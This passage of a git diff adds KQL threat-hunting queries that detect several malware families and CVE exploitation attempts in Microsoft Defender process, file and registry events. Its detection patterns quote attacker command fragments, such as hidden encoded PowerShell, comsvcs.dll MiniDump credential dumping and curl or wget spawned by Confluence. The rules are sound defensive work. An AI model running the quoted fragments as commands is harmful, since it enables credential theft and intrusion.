+| where (InitiatingProcessFolderPath endswith "\\Sysmon.exe" or InitiatingProcessFolderPath endswith "\\Sysmon64.exe") and (not(((FolderPath contains ":\\Windows\\Sysmon.exe" or FolderPath contains ":\\Windows\\Sysmon64.exe" or FolderPath contains ":\\Windows\\System32\\conhost.exe" or FolderPath contains ":\\Windows\\System32\\WerFault.exe" or FolderPath contains ":\\Windows\\System32\\WerFaultSecure.exe" or FolderPath contains ":\\Windows\\System32\\wevtutil.exe" or FolderPath contains ":\\Windows\\SysWOW64\\wevtutil.exe") or isnull(FolderPath) or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql
new file mode 100644
index 00000000..c8c23753
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql
@@ -0,0 +1,12 @@
+// Title: ChromeLoader Malware Execution
+// Author: @kostastsale
+// Date: 2022-01-10
+// Level: high
+// Description: Detects execution of ChromeLoader malware via a registered scheduled task
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*" and FolderPath endswith "\\chrome.exe" and InitiatingProcessCommandLine contains "-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB" and InitiatingProcessFolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql
new file mode 100644
index 00000000..82e4a93b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql
@@ -0,0 +1,13 @@
+// Title: Emotet Loader Execution Via .LNK File
+// Author: @kostastsale
+// Date: 2022-04-22
+// Level: high
+// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
+// The ".lnk" file was delivered via phishing campaign.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" and ProcessCommandLine contains ".vbs" and ProcessCommandLine contains ".lnk") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql
new file mode 100644
index 00000000..e99facbe
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Hermetic Wiper TG Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\policydefinitions\\postgresql.exe" or ((ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp" or ProcessCommandLine contains " 1> \\\\127.0.0.1\\ADMIN$\\__16") or (ProcessCommandLine contains "powershell -c " and ProcessCommandLine contains "\\comsvcs.dll MiniDump " and ProcessCommandLine contains "\\winupd.log full"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql
new file mode 100644
index 00000000..acab6340
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql
@@ -0,0 +1,10 @@
+// Title: Potential Raspberry Robin Dot Ending File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-28
+// Level: high
+// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql
new file mode 100644
index 00000000..28c17306
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql
@@ -0,0 +1,12 @@
+// Title: Raspberry Robin Initial Execution From External Drive
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:") and ((ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and FolderPath endswith "\\msiexec.exe") and (InitiatingProcessCommandLine contains "/r" and (InitiatingProcessCommandLine endswith ".bin" or InitiatingProcessCommandLine endswith ".ico" or InitiatingProcessCommandLine endswith ".lnk" or InitiatingProcessCommandLine endswith ".lo" or InitiatingProcessCommandLine endswith ".sv" or InitiatingProcessCommandLine endswith ".usb") and InitiatingProcessFolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql
new file mode 100644
index 00000000..9379fc4c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql
@@ -0,0 +1,12 @@
+// Title: Raspberry Robin Subsequent Execution of Commands
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects raspberry robin subsequent execution of commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "installdriver" or ProcessCommandLine contains "setfiledsndir" or ProcessCommandLine contains "vkipdse") and (ProcessCommandLine contains "odbcconf.exe" and ProcessCommandLine contains "regsvr" and ProcessCommandLine contains "shellexec_rundll") and (ProcessCommandLine endswith "-a" or ProcessCommandLine endswith "/a" or ProcessCommandLine endswith "–a" or ProcessCommandLine endswith "—a" or ProcessCommandLine endswith "―a" or ProcessCommandLine endswith "-f" or ProcessCommandLine endswith "/f" or ProcessCommandLine endswith "–f" or ProcessCommandLine endswith "—f" or ProcessCommandLine endswith "―f" or ProcessCommandLine endswith "-s" or ProcessCommandLine endswith "/s" or ProcessCommandLine endswith "–s" or ProcessCommandLine endswith "—s" or ProcessCommandLine endswith "―s") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe") and InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql
new file mode 100644
index 00000000..52444c1c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql
@@ -0,0 +1,14 @@
+// Title: Serpent Backdoor Payload Execution Via Scheduled Task
+// Author: @kostastsale
+// Date: 2022-03-21
+// Level: high
+// Description: Detects post exploitation execution technique of the Serpent backdoor.
+// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
+// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "[System/EventID=" and ProcessCommandLine contains "/create" and ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/ec" and ProcessCommandLine contains "/so" and ProcessCommandLine contains "/tn run") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql
new file mode 100644
index 00000000..d809f987
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql
@@ -0,0 +1,12 @@
+// Title: FakeUpdates/SocGholish Activity
+// Author: @kostastsale
+// Date: 2022-06-16
+// Level: high
+// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessCommandLine contains "Chrome" or InitiatingProcessCommandLine contains "Edge" or InitiatingProcessCommandLine contains "Firefox" or InitiatingProcessCommandLine contains "Opera" or InitiatingProcessCommandLine contains "Brave" or InitiatingProcessCommandLine contains "Vivaldi") and (InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" and InitiatingProcessCommandLine contains ".zip" and InitiatingProcessCommandLine contains "update" and InitiatingProcessCommandLine contains ".js") and InitiatingProcessFolderPath endswith "\\wscript.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql
new file mode 100644
index 00000000..daa38ffa
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential ACTINIUM Persistence Activity
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "create" and ProcessCommandLine contains "wscript" and ProcessCommandLine contains " /e:vbscript"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql b/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql
new file mode 100644
index 00000000..bb9bdb08
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql
@@ -0,0 +1,10 @@
+// Title: MERCURY APT Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects suspicious command line patterns seen being used by MERCURY APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-exec bypass -w 1 -enc" and ProcessCommandLine contains "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
new file mode 100644
index 00000000..83901817
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/echo" or FolderPath endswith "/wget") and (InitiatingProcessCommandLine contains "confluence" and InitiatingProcessFolderPath endswith "/java")) and (not(ProcessCommandLine contains "ulimit -u"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
new file mode 100644
index 00000000..b6ff4139
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: medium
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) and (InitiatingProcessCommandLine contains "confluence" and (InitiatingProcessFolderPath endswith "\\tomcat8.exe" or InitiatingProcessFolderPath endswith "\\tomcat9.exe" or InitiatingProcessFolderPath endswith "\\tomcat10.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql
new file mode 100644
index 00000000..b80bf182
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql
@@ -0,0 +1,12 @@
+// Title: Outlook Task/Note Reminder Received
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-05
+// Level: low
+// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats
+// False Positives:
+//   - Legitimate reminders received for a task or a note will also trigger this rule.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Tasks*" or RegistryKey endswith "\\Notes*") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook*")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
new file mode 100644
index 00000000..7b0f4745
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
+// Author: Gregory
+// Date: 2023-10-11
+// Level: high
+// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\FoxitPDFReader.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" and FolderPath endswith ".hta"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
new file mode 100644
index 00000000..7dac7d99
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql
@@ -0,0 +1,15 @@
+// Title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
+// Author: @kostastsale
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.
+// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.
+// Hunting Opportunity
+// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats
+// False Positives:
+//   - Initial software installation and software updates.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and InitiatingProcessCommandLine contains "moveitdmz pool" and InitiatingProcessFolderPath endswith "\\w3wp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
new file mode 100644
index 00000000..7b2ce655
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\$WinREAgent\\" or FolderPath contains ":\\Windows\\servicing\\LCU\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\" or FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
new file mode 100644
index 00000000..e3ec872b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "powershell_ise.EXE", "powershell.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
new file mode 100644
index 00000000..18e47b3f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: medium
+// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains ":\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\" and FolderPath endswith "\\Report.wer") and (not((FolderPath contains "\\ReportArchive\\AppCrash_" or FolderPath contains "\\ReportArchive\\AppHang_" or FolderPath contains "\\ReportArchive\\Critical_" or FolderPath contains "\\ReportArchive\\Kernel_" or FolderPath contains "\\ReportArchive\\NonCritical_")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql
new file mode 100644
index 00000000..4556f6f1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36884 Exploitation Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" and FolderPath endswith "\\file001.url" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
new file mode 100644
index 00000000..cbc6e8f2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-38331, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\WinRAR.exe" and FolderPath contains "\\AppData\\Local\\Temp\\Rar$" and FolderPath matches regex "\\.[a-zA-Z0-9]{1,4} \\."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
new file mode 100644
index 00000000..894b4988
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
+// MITRE Tactic: Execution
+// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe"))) and ProcessCommandLine matches regex "\\.[a-zA-Z0-9]{1,4} \\." and ProcessCommandLine contains "\\AppData\\Local\\Temp\\Rar$" and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql
new file mode 100644
index 00000000..2bec633b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: low
+// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-40477, detection.emerging-threats
+// False Positives:
+//   - Legitimate extraction of multipart or recovery volumes ZIP files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\WinRAR.exe") and FolderPath endswith ".rev"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
new file mode 100644
index 00000000..34ece3d8
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql
@@ -0,0 +1,10 @@
+// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2023-01-21
+// Level: high
+// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-k DHCPServer" and FolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "-k DHCPServer" and InitiatingProcessFolderPath endswith "\\svchost.exe" and (AccountName contains "NETWORK SERVICE" or AccountName contains "NETZWERKDIENST" or AccountName contains "SERVIZIO DI RETE" or AccountName contains "SERVICIO DE RED")
\ No newline at end of file
